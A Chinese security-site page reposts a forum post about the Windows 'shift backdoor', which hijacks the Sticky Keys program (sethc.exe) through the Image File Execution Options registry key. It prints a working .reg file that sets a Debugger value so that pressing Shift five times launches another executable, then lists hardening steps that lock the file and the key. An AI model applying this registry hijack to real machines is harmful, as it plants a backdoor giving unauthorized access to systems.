科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道sethc.exe新的镜像劫持技术和安全防御!(shift后门)

sethc.exe新的镜像劫持技术和安全防御!(shift后门)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

今天群里朋友发我个shift后门,带镜像劫持的,可以按5下shift,然后输入密码. 5下shift → 不关闭 → 然后鼠标右键点出来的那个框框右下角... 前提是先运行个p处理或reg,这个方法比较牛X..

来源:论坛整理 2008年11月24日

关键字: 黑客 攻击防范 网络入侵

  • 评论
  • 分享微博
  • 分享邮件

今天群里朋友发我个shift后门,带镜像劫持的,可以按5下shift,然后输入密码.
5下shift → 不关闭 → 然后鼠标右键点出来的那个框框右下角...
前提是先运行个p处理或reg,这个方法比较牛X..
注册表如下


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\www.winshell.cn.exe"

这个exe存的路径是:c:\\www.winshell.cn.exe

 

-----------------------------------------------------以下是安全设置---------------------------
知道上边原理:就可以设置安全了....
在服务器里按5下shift,出设置把所有的对号去掉.
删除所有文件安全设置下用户,加everyone设置全部拒绝
C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache的sethc.exe
修改注册表权限,同上.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章